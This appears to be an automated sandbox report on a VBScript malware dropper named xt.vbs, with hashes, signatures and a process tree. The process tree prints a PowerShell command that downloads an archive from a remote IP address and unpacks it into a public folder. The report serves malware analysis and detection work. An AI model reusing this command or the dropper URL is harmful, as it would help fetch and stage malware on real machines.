Analysis
-
max time kernel
361s -
max time network
362s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
20-03-2024 19:06
Static task
static1
Behavioral task
behavioral1
Sample
xt.vbs
Resource
win7-20240221-en
4 signatures
600 seconds
Behavioral task
behavioral2
Sample
xt.vbs
Resource
win10v2004-20240226-en
14 signatures
600 seconds
General
-
Target
xt.vbs
-
Size
728B
-
MD5
617b93b01b88973de9237d3115c73b7a
-
SHA1
2b17b017b3b552d0d0744810a8b50420baf847d1
-
SHA256
45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b
-
SHA512
458c8c1239f88a19b83c5c370e7bf87efd4d57abc2a406e1ec5f6edabb95b6f644c384cc9669710529faf90e5c03890f7bb7e7a5a6a098d1e5b9fdca254c6d77
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://45.80.158.168:222/x.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2784 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2188 wrote to memory of 2784 2188 WScript.exe powershell.exe PID 2188 wrote to memory of 2784 2188 WScript.exe powershell.exe PID 2188 wrote to memory of 2784 2188 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784